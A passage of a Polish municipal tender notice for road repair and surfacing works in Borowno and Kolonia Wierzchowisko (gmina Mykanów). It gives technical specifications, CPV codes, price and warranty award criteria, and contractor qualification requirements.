rękojmi za wady fizyczne wynikające z przepisów kodeksu cywilnego w terminach tam określonych – niezależnie od uprawnień z tytułu gwarancji. <br/>Udzielając gwarancji Wykonawca zapewnia bezpłatne czynności przeglądów gwarancyjnych w okresie udzielonej gwarancji na cały przedmiot zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233100-0 - Roboty w zakresie budowy autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji/rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2- opis zadania:<br/><br/>1)	„UTWARDZENIE TERENU CZĘŚCI DZIAŁKI EWIDENCYJNEJ NR 310 W MIEJSCOWOŚCI BOROWNO”<br/><br/>Lokalizacja inwestycji:<br/>Teren inwestycji zlokalizowany jest na działce ew. nr 310 z obrębu 0014 w miejscowości Borowno, województwo śląskie.<br/><br/>Realizacja zadania obejmuje wykonanie układu komunikacyjnego dla pieszych i pojazdów mechanicznych na terenie działki ewidencyjnej nr 310 z obrębu 0014 w miejscowości Borowno.<br/>Projektuje się utwardzenie terenu o nawierzchni asfaltowej. <br/>Z projektowanego utwardzenia terenu korzystać będą w szczególności samochody osobowe oraz piesi. <br/>Dla projektowanej nawierzchni utwardzenia terenu przyjęto kategorię obciążenia ruchem KR1.<br/>Ukształtowanie wysokościowe zostało zaprojektowane z zachowaniem istniejących wysokości na włączeniu do jezdni drogi gminnej oraz z zachowaniem istniejącego.<br/><br/>Konstrukcja utwardzenia terenu/zjazdu:<br/>- Warstwa ścieralna z betonu asfaltowego AC11S - 5 cm;<br/>- Istniejąca nawierzchnia jezdni.<br/><br/>Zestawienie powierzchni<br/>- Nawierzchnia utwardzenia 374,00 m2<br/>- Nawierzchnia zjazdu 14,00 m2<br/><br/>Nazwy i kody CPV:<br/><br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233100-0 Roboty w zakresie budowy autostrad, dróg<br/>45233200-1 Roboty w zakresie różnych nawierzchni<br/>45450000-6 Roboty budowlane wykończeniowe, pozostałe<br/><br/>2)	„REMONT DROGI GMINNEJ ULICY KLONOWEJ W MIEJSCOWOŚCI BOROWNO”<br/><br/>Lokalizacja inwestycji:<br/>Planowana inwestycja zlokalizowana jest na działkach ew. nr 191, 363, 307, 308, 302 z obrębu 0014 Kolonia Borowno, jedn. ew. 240411_2 na terenie m. Borowno, gmina Mykanów.<br/>Inwestycja polegać będzie na remoncie drogi gminnej ulicy Klonowej w miejscowości Borowno <br/>na odcinku o długości 311,02 m.b. <br/><br/>W ramach inwestycji przewiduje się:<br/>- remont nawierzchni jezdni asfaltowej w formie nakładki,<br/>- remont poboczy o nawierzchni z destruktu asfaltowego,<br/>- remont poboczy o nawierzchni asfaltowej,<br/>- remont poboczy o nawierzchni z płyt betonowych,<br/>- remont zatoki postojowej o nawierzchni asfaltowej,<br/>- remont chodnika o nawierzchni z brukowej kostki betonowej<br/><br/>Parametry techniczne drogi gminnej:<br/>1. Kategoria funkcjonalna drogi: droga gminna<br/>2. Klasa techniczna drogi: droga lokalna - D<br/>3. Wymagana nośność: dla kategorii ruchu KR1<br/>4. Nawierzchnia jezdni: beton asfaltowy<br/>5. Szerokość jezdni: 4,5 m<br/>6. Nawierzchnia poboczy: destrukt asfaltowy, beton asfaltowy, płyty betonowe<br/>7. Szerokość poboczy: obustronne: szerokość zgodnie ze stanem istniejącym<br/>8. Nawierzchnia chodnika: brukowa kostka betonowa<br/>9. Szerokość chodnika: szerokość zgodnie ze stanem istniejącym<br/>10. Nawierzchnia zatoki postojowej: beton asfaltowy<br/>11. Szerokość zatoki postojowej: szerokość zgodnie ze stanem istniejącym<br/>12. Odwodnienie: teren nieutwardzony w granicach pasa drogowego<br/>13. Długość odcinka: 311,02 m.b.<br/><br/>Konstrukcja projektowanych poboczy:<br/>- warstwa destruktu asfaltowego – 20 cm<br/><br/>Konstrukcja projektowanych poboczy:<br/>- płyty betonowe 60x40 cm szare – 8 cm,<br/>- podsypka piaskowa – 4 cm;<br/>- warstwa podbudowy zasadniczej z mieszanki niezwiązanej z kruszywem 0/31,5 mm <br/>(wg PN-EN 13242) – 20 cm,<br/>- warstwa ulepszonego podłoża z kruszywa naturalnego (wg PN-EN 13242) – 15 cm.<br/><br/>Konstrukcja projektowanej jezdni, pobocza, zatoki postojowej – nakładka asfaltowa:<br/>- warstwa ścieralna z betonu asfaltowego AC11S (wg PN-EN 13108-1) – 5 cm,<br/>- frezowanie istniejącej nawierzchni asfaltowej 2-5 cm,<br/>- istniejąca nawierzchnia jezdni.<br/><br/>Kolejność prowadzenia robót: <br/>- wykonanie pomiarów geodezyjnych,<br/>- frezowanie jezdni, oczyszczenie jezdni,<br/>- skropienie jezdni emulsją asfaltową,<br/>- korytowanie pod konstrukcje poboczy, chodnika,<br/>- profilowanie i zagęszczanie podłoża,<br/>- wykonanie konstrukcji nawierzchni jezdni,<br/>- wykonanie poboczy, chodnika, zatok postojowych.<br/><br/>Faktyczna kolejność realizacji poszczególnych elementów robót, zostanie ustalona przez kierownika robót w porozumieniu z Inwestorem i zawarta w planie bezpieczeństwa i ochrony zdrowia.<br/><br/>Wykonawca zobowiązany jest po wykonaniu umowy sporządzić i przekazać Zamawiającemu Kosztorys Powykonawczy dla części 1; części 3 i dla części 2 – osobno dla każdej remontowanej drogi.<br/><br/>3. Wszystkie wielkości wynikające z konieczności wykonania niezbędnych prac budowlanych przestawiono jednocześnie w przedmiarach robót i dokumentacji technicznej w tym specyfikacji technicznej wykonania i odbioru robót – załącznik nr. 8 do SWZ/ dla wszystkich części/.<br/>4. Z uwagi na to, że wynagrodzenie wykonawcy wskazane w ofercie będzie miało charakter ryczałtowy, wykonawca przy wycenie oferty powinien opierać się na zakresie wskazanym w dokumentacji projektowej, o której mowa powyżej, dokumentacji technicznej i wszystkich pozostałych dokumentach stanowiących załącznik nr. 8 do SWZ / dla części 1 , 2 i 3/ oraz wszelkich informacjach publikowanych przez Zamawiającego w toku postępowania, np. odpowiedzi na potencjalne pytania wykonawców. <br/>Przedmiar robót dla części 1, części 2 i części 3 ma charakter pomocniczy. Wystąpienie w trakcie realizacji umowy robót nieujętych w przedmiarze lub robót w większej ilości w stosunku do przyjętej w przedmiarze nie będzie uprawniało wykonawcy do żądania dodatkowego wynagrodzenia - jeżeli roboty te ujęte były w dokumentacji projektowej i technicznej stanowiącej załącznik nr. 8 do SWZ.<br/>5. Po zakończeniu robót wykonawca zobowiązany jest do przywrócenia porządku i czystości na terenie objętym robotami oraz do wywiezienia wszelkich pozostałości budowlanych oraz odpadów zielonych z terenu inwestycji i ich utylizowania. <br/>6. Dokumenty stanowiące o niniejszym zamówieniu w tym projekt umowy należy traktować jako wzajemnie wyjaśniające się i równoważne. Wymagania określone w choćby jednym z dokumentów są obowiązujące dla Wykonawcy tak jakby zawarte były w całej dokumentacji. Jeżeli zostaną znalezione dwuznaczności lub rozbieżności między tymi dokumentami, to Zamawiający po uzyskaniu opinii Nadzoru Inwestorskiego udzieli w tym zakresie niezbędnych wyjaśnień lub wyda Wykonawcy niezbędne polecenia. Wykonawca nie może wykorzystywać tych dwuznaczności i rozbieżności przeciwko i na niekorzyść Zamawiającego.<br/><br/>Uwaga: <br/>Podstawą sporządzenia oferty jest dokumentacja, która jest załącznikiem nr 8 do niniejszej SWZ dla części 1 , części 2 i części 3.<br/><br/>7. Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie materiałów równoważnych o parametrach technicznych nie gorszych niż określono w dokumentacji technicznej. <br/> <br/>8. Do zadań Wykonawcy należeć będzie również: urządzenie zaplecza placu budowy, przestrzegania przepisów Kodeksu Pracy, BHP, ochrony zdrowia i p.poż., zabezpieczenie placu budowy przed dostępem osób trzecich, odpowiednie oznakowanie prowadzonych robót. <br/>Zamawiający wymaga aby Wykonawca przed przystąpieniem do robót i w trakcie kontrolował i potwierdził rzeczywiste posadowienie w terenie istniejącej podziemnej infrastruktury technicznej (punktowe odkrywki). Wykopy w miejscach z uzbrojeniem podziemnym, należy wykonać ręcznie z zachowaniem szczególnej ostrożności w porozumieniu z przedstawicielami zarządców tych obiektów. Roboty z wykorzystaniem sprzętu zmechanizowanego wykonać należy z zachowaniem szczególnej ostrożności tak aby nie naruszać uzbrojenia naziemnego i podziemnego.<br/>Zamawiający nie dopuszcza możliwości roszczeń Wykonawcy z tytułu błędnego oszacowania ceny lub pominięcia kosztów i innych czynników mających lub mogących mieć wpływ na cenę.<br/>9.Na podstawie art.95 ust.1 Pzp Zamawiający wymaga zatrudnienia przez wykonawcę, podwykonawcę lub dalszego podwykonawcę dla każdej części tj. część 1, część 2, części 3 - osób wykonujących wszelkie czynności wchodzące w tzw. koszty bezpośrednie na podstawie umowy o pracę. <br/><br/>10. Gwarancja dla wszystkich części tj. dla części 1, części 2, części 3<br/>Długość okresu gwarancji na roboty budowlane - stanowi kryterium oceny ofert. <br/>Okres rękojmi za wady będzie równy okresowi udzielonej gwarancji.<br/>Zamawiający określa go na okres w przedziale od 60 miesięcy (termin minimalny wymagany przez Zamawiającego) do 84 miesięcy (termin maksymalny). <br/>Uwaga:<br/>1)	Termin gwarancji stanowi kryterium oceny ofert.<br/>2)	Termin gwarancji należy zadeklarować w pełnych miesiącach od daty podpisania przez obie strony <br/>protokołu wykonania przedmiotu umowy.<br/>3)	Określenie terminu gwarancji w Formularzu Ofertowym poniżej wymaganego minimum <br/>tj. 60 miesięcy Zamawiający uzna iż Wykonawca zaoferował 60 miesięczny okres gwarancji<br/>4)	W przypadku deklaracji terminu gwarancji w Formularzu Ofertowym powyżej określonego maksimum, do porównania złożonych ofert przyjęte zostanie 84 miesięcy. <br/>5)	W przypadku gdy Wykonawca nie określi w Formularzu Ofertowym okresu gwarancji <br/>Zamawiający przyjmie gwarancję minimalną tj. 60 miesięcy.<br/>6)	Okres gwarancyjny nie zostanie uznany za zakończony, dopóki nie zostaną usunięte przez <br/>Wykonawcę wady i usterki zgłoszone do czasu upływu terminu gwarancyjnego oraz nie wygaśnie bieg gwarancji zgodnie z art.581 par.1 KC, a potwierdzeniem zakończenia będzie podpisany przez obie strony protokół odbioru pogwarancyjnego.	<br/>7)	Jeżeli Wykonawca nie usunie wad lub usterek w okresie gwarancji lub rękojmi w wyznaczonym przez Zamawiającego terminie Zamawiający po uprzednim zawiadomieniu Wykonawcy, może zlecić ich usunięcie osobie trzeciej na koszt Wykonawcy.<br/><br/>Okres gwarancyjny nie zostanie uznany za zakończony, dopóki nie zostaną usunięte przez Wykonawcę wady i usterki zgłoszone do czasu upływu terminu gwarancyjnego oraz nie wygaśnie bieg gwarancji zgodnie z art. 581 par.1 Kodeksu cywilnego, a potwierdzeniem zakończenia będzie podpisany przez obie strony protokół odbioru pogwarancyjnego. <br/>Umowa stanowi dokument gwarancyjny o jakim mowa w art. 577 § 1 kc. <br/>Zamawiającemu przysługują pełne uprawnienia z tytułu rękojmi za wady fizyczne wynikające z przepisów kodeksu cywilnego w terminach tam określonych – niezależnie od uprawnień z tytułu gwarancji. <br/>Udzielając gwarancji Wykonawca zapewnia bezpłatne czynności przeglądów gwarancyjnych w okresie udzielonej gwarancji na cały przedmiot zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233100-0 - Roboty w zakresie budowy autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji/rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3- opis zadania:<br/><br/>„REMONT DROGI GMINNEJ W RAMACH ZADANIA INWESTYCYJNEGO PN.: MODERNIZACJA DROGI ULICY POGODNEJ W MIEJSCOWOŚCI KOLONIA WIERZCHOWISKO”<br/><br/>Lokalizacja inwestycji:<br/>Teren inwestycji zlokalizowany jest na działkach ew. nr 63/2, 1075, 178/9, 179/2 z obrębu 0025 Wierzchowisko, jedn. ew. nr 240411_2, gmina Mykanów, województwo śląskie.<br/>Inwestycja polegać będzie na remoncie drogi gminnej ulicy Pogodnej w miejscowości Kolonia<br/>Wierzchowisko na odcinku o długości łącznie 285,41 m.b. Remont wykonany zostanie na dwóch odcinkach jezdni. Pierwszy odcinek o długości 81,35 m.b. oraz drugi odcinek o długości 204,06 m.b. <br/><br/>W ramach inwestycji projektuje się:<br/>- remont nawierzchni jezdni asfaltowej w formie nakładki,<br/>- odtworzenie poboczy o nawierzchni z destruktu asfaltowego<br/><br/>Wielkości podstawowe zadania<br/>- powierzchnia jezdni: 1035,00 m2<br/>- powierzchnia poboczy: 326,00 m2<br/>- długość projektowanego odcinka: 285,41 m.b.<br/><br/>Parametry techniczne drogi gminnej:<br/>1. Kategoria funkcjonalna drogi: droga gminna<br/>2. Klasa techniczna drogi: droga lokalna - D<br/>3. Wymagana nośność: dla kategorii ruchu KR1<br/>4. Nawierzchnia jezdni: beton asfaltowy<br/>5. Szerokość jezdni: 3,0 m – 5,0 m<br/>6. Pobocza: obustronne: 0,5 m – 0,75 m<br/>7. Odwodnienie: teren nieutwardzony w granicach pasa drogowego<br/>8. Długość odcinka: 285,41 m.b.<br/><br/>Konstrukcja projektowanych poboczy:<br/>- warstwa destruktu asfaltowego – 20 cm<br/><br/>Konstrukcja projektowanej jezdni – nakładka asfaltowa:<br/>- warstwa ścieralna z betonu asfaltowego AC11S (wg PN-EN 13108-1) – 4 cm,<br/>- warstwa wiążąca (wyrównawcza) z betonu asfaltowego AC16W (wg PN-EN 13108-1) – 100 kg/m2,<br/>- istniejąca nawierzchnia jezdni<br/><br/>Kolejność prowadzenia robót: <br/>- wykonanie pomiarów geodezyjnych,<br/>- frezowanie jezdni, oczyszczenie jezdni,<br/>- skropienie jezdni emulsją asfaltową,<br/>- korytowanie pod konstrukcje poboczy,<br/>- profilowanie i zagęszczanie podłoża,<br/>- wykonanie konstrukcji nawierzchni jezdni,<br/>- wykonanie poboczy.<br/><br/>Faktyczna kolejność realizacji poszczególnych elementów robót, zostanie ustalona przez kierownika robót w porozumieniu z Inwestorem i zawarta w planie bezpieczeństwa i ochrony zdrowia.<br/><br/>Nazwy i kody CPV:<br/>45111000-8 Roboty w zakresie burzenia, roboty ziemne<br/>45233100-0 Roboty w zakresie budowy autostrad, dróg<br/>45233200-1 Roboty w zakresie różnych nawierzchni<br/>45450000-6 Roboty budowlane wykończeniowe, pozostałe<br/>Wykonawca zobowiązany jest po wykonaniu umowy sporządzić i przekazać Zamawiającemu Kosztorys Powykonawczy dla części 1; części 3 i dla części 2 – osobno dla każdej remontowanej drogi.<br/><br/>3. Wszystkie wielkości wynikające z konieczności wykonania niezbędnych prac budowlanych przestawiono jednocześnie w przedmiarach robót i dokumentacji technicznej w tym specyfikacji technicznej wykonania i odbioru robót – załącznik nr. 8 do SWZ/ dla wszystkich części/.<br/>4. Z uwagi na to, że wynagrodzenie wykonawcy wskazane w ofercie będzie miało charakter ryczałtowy, wykonawca przy wycenie oferty powinien opierać się na zakresie wskazanym w dokumentacji projektowej, o której mowa powyżej, dokumentacji technicznej i wszystkich pozostałych dokumentach stanowiących załącznik nr. 8 do SWZ / dla części 1 i 2 i 3/ oraz wszelkich informacjach publikowanych przez Zamawiającego w toku postępowania, np. odpowiedzi na potencjalne pytania wykonawców. <br/>Przedmiar robót dla części 1 , części 2 i części 3 ma charakter pomocniczy. Wystąpienie w trakcie realizacji umowy robót nieujętych w przedmiarze lub robót w większej ilości w stosunku do przyjętej w przedmiarze nie będzie uprawniało wykonawcy do żądania dodatkowego wynagrodzenia - jeżeli roboty te ujęte były w dokumentacji projektowej i technicznej stanowiącej załącznik nr. 8 do SWZ.<br/>5. Po zakończeniu robót wykonawca zobowiązany jest do przywrócenia porządku i czystości na terenie objętym robotami oraz do wywiezienia wszelkich pozostałości budowlanych oraz odpadów zielonych z terenu inwestycji i ich utylizowania. <br/>6. Dokumenty stanowiące o niniejszym zamówieniu w tym projekt umowy należy traktować jako wzajemnie wyjaśniające się i równoważne. Wymagania określone w choćby jednym z dokumentów są obowiązujące dla Wykonawcy tak jakby zawarte były w całej dokumentacji. Jeżeli zostaną znalezione dwuznaczności lub rozbieżności między tymi dokumentami, to Zamawiający po uzyskaniu opinii Nadzoru Inwestorskiego udzieli w tym zakresie niezbędnych wyjaśnień lub wyda Wykonawcy niezbędne polecenia. Wykonawca nie może wykorzystywać tych dwuznaczności i rozbieżności przeciwko i na niekorzyść Zamawiającego.<br/><br/>Uwaga: <br/>Podstawą sporządzenia oferty jest dokumentacja, która jest załącznikiem nr 8 do niniejszej SWZ dla części 1 , części 2 i części 3.<br/><br/>7. Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie materiałów równoważnych o parametrach technicznych nie gorszych niż określono w dokumentacji technicznej. <br/>8. Do zadań Wykonawcy należeć będzie również: urządzenie zaplecza placu budowy, przestrzegania przepisów Kodeksu Pracy, BHP, ochrony zdrowia i p.poż., zabezpieczenie placu budowy przed dostępem osób trzecich, odpowiednie oznakowanie prowadzonych robót. <br/>Zamawiający wymaga aby Wykonawca przed przystąpieniem do robót i w trakcie kontrolował i potwierdził rzeczywiste posadowienie w terenie istniejącej podziemnej infrastruktury technicznej (punktowe odkrywki). Wykopy w miejscach z uzbrojeniem podziemnym, należy wykonać ręcznie z zachowaniem szczególnej ostrożności w porozumieniu z przedstawicielami zarządców tych obiektów. Roboty z wykorzystaniem sprzętu zmechanizowanego wykonać należy z zachowaniem szczególnej ostrożności tak aby nie naruszać uzbrojenia naziemnego i podziemnego.<br/>Zamawiający nie dopuszcza możliwości roszczeń Wykonawcy z tytułu błędnego oszacowania ceny lub pominięcia kosztów i innych czynników mających lub mogących mieć wpływ na cenę.<br/>9.Na podstawie art.95 ust.1 Pzp Zamawiający wymaga zatrudnienia przez wykonawcę, podwykonawcę lub dalszego podwykonawcę dla każdej części tj. część 1, część 2, części 3 - osób wykonujących wszelkie czynności wchodzące w tzw. koszty bezpośrednie na podstawie umowy o pracę. Tak, więc wymóg ten dotyczy min. czynności: <br/>- roboty rozbiórkowe,<br/>- roboty ziemne,<br/>- roboty w zakresie wykonywania nawierzchni utwardzonej.<br/>- operatorów sprzętu<br/>- pracowników fizycznych.<br/>Wymóg zatrudnienia w stosunku pracy nie dotyczy osób pełniących samodzielne funkcje techniczne w budownictwie w rozumieniu ustawy Prawo budowlane, a także innych czynności polegających na sprawowaniu nadzoru nad wykonywanymi robotami.<br/>Sposób weryfikacji zatrudnienia tych osób, uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę wymagań związanych z zatrudnieniem tych osób oraz sankcji z tytułu niespełnienia tych wymagań zawarto we wzorze umowy paragraf 10<br/>– załącznik nr 7 do SWZ<br/><br/>10. Gwarancja dla wszystkich części tj. dla części 1, części 2, części 3<br/>Długość okresu gwarancji na roboty budowlane - stanowi kryterium oceny ofert. <br/>Okres rękojmi za wady będzie równy okresowi udzielonej gwarancji.<br/>Zamawiający określa go na okres w przedziale od 60 miesięcy (termin minimalny wymagany przez Zamawiającego) do 84 miesięcy (termin maksymalny). <br/>Uwaga:<br/>1)	Termin gwarancji stanowi kryterium oceny ofert.<br/>2)	Termin gwarancji należy zadeklarować w pełnych miesiącach od daty podpisania przez obie strony <br/>protokołu wykonania przedmiotu umowy.<br/>3)	Określenie terminu gwarancji w Formularzu Ofertowym poniżej wymaganego minimum <br/>tj. 60 miesięcy Zamawiający uzna iż Wykonawca zaoferował 60 miesięczny okres gwarancji<br/>4)	W przypadku deklaracji terminu gwarancji w Formularzu Ofertowym powyżej określonego maksimum, do porównania złożonych ofert przyjęte zostanie 84 miesięcy. <br/>5)	W przypadku gdy Wykonawca nie określi w Formularzu Ofertowym okresu gwarancji <br/>Zamawiający przyjmie gwarancję minimalną tj. 60 miesięcy.<br/>6)	Okres gwarancyjny nie zostanie uznany za zakończony, dopóki nie zostaną usunięte przez <br/>Wykonawcę wady i usterki zgłoszone do czasu upływu terminu gwarancyjnego oraz nie wygaśnie bieg gwarancji zgodnie z art.581 par.1 KC, a potwierdzeniem zakończenia będzie podpisany przez obie strony protokół odbioru pogwarancyjnego.	<br/>7)	Jeżeli Wykonawca nie usunie wad lub usterek w okresie gwarancji lub rękojmi w wyznaczonym przez Zamawiającego terminie Zamawiający po uprzednim zawiadomieniu Wykonawcy, może zlecić ich usunięcie osobie trzeciej na koszt Wykonawcy.<br/><br/>Okres gwarancyjny nie zostanie uznany za zakończony, dopóki nie zostaną usunięte przez Wykonawcę wady i usterki zgłoszone do czasu upływu terminu gwarancyjnego oraz nie wygaśnie bieg gwarancji zgodnie z art. 581 par.1 Kodeksu cywilnego, a potwierdzeniem zakończenia będzie podpisany przez obie strony protokół odbioru pogwarancyjnego. <br/>Umowa stanowi dokument gwarancyjny o jakim mowa w art. 577 § 1 kc. <br/>Zamawiającemu przysługują pełne uprawnienia z tytułu rękojmi za wady fizyczne wynikające z przepisów kodeksu cywilnego w terminach tam określonych – niezależnie od uprawnień z tytułu gwarancji. <br/>Udzielając gwarancji Wykonawca zapewnia bezpłatne czynności przeglądów gwarancyjnych w okresie udzielonej gwarancji na cały przedmiot zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233100-0 - Roboty w zakresie budowy autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej gwarancji/rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.Na podstawie art.112 ustawy Pzp, Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/> 1.1. zdolności do występowania w obrocie gospodarczym:<br/><br/> Zamawiający nie stawia warunku w tym zakresie dla części 1 ,części 2 i części 3<br/><br/> 1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/> <br/> Zamawiający nie stawia warunku w tym zakresie dla części 1 ,części 2 i części 3<br/><br/> 1.3. sytuacji ekonomicznej lub finansowej <br/><br/> Zamawiający uzna, że Wykonawca spełnia warunek, jeżeli:<br/>a) Wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż:<br/>- 500 000,00 zł dla części 1 <br/>- 200 000,00 zł dla części 2 i części 3<br/>Uwaga:<br/>Zamawiający dopuszcza, że w przypadku, gdy ofertę składają wykonawcy wspólnie ubiegający się o zamówienie to określony warunek musi spełniać jeden z wykonawców. <br/><br/> 1.4. zdolności technicznej lub zawodowej dla części 1, części 2 i części 3<br/> a) Warunek zostanie spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał i prawidłowo ukończył co najmniej jedną robotę budowlaną polegającą na wykonaniu robót drogowych zawierających w swym zakresie przebudowę lub budowę lub remont drogi o nawierzchni betonowo-asfaltowej o powierzchni minimum 300 mb . <br/>Wykaz wraz z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty;<br/><br/>UWAGA! Jako wykonanie (zakończenie) zadania należy rozumieć podpisanie co najmniej protokołu końcowego odbioru robót lub równoważnego dokumentu.<br/><br/>Uwaga<br/>Zamawiający dopuszcza, że w przypadku, gdy ofertę składają wykonawcy wspólnie ubiegający się o zamówienie, to warunek ten powinien spełniać ten podmiot, który w ramach wewnętrznego podziału zadań zrealizuje tę cześć zamówienia, z którą wiąże się posiadanie konkretnego doświadczenia, kwalifikacji. <br/>W przypadku, gdy wykonawca nabył doświadczenie przy realizacji zamówienia, jako członek konsorcjum, winien wykazać, że bezpośrednio wykonywał tę część zamówienia, która odpowiadała zakresowi 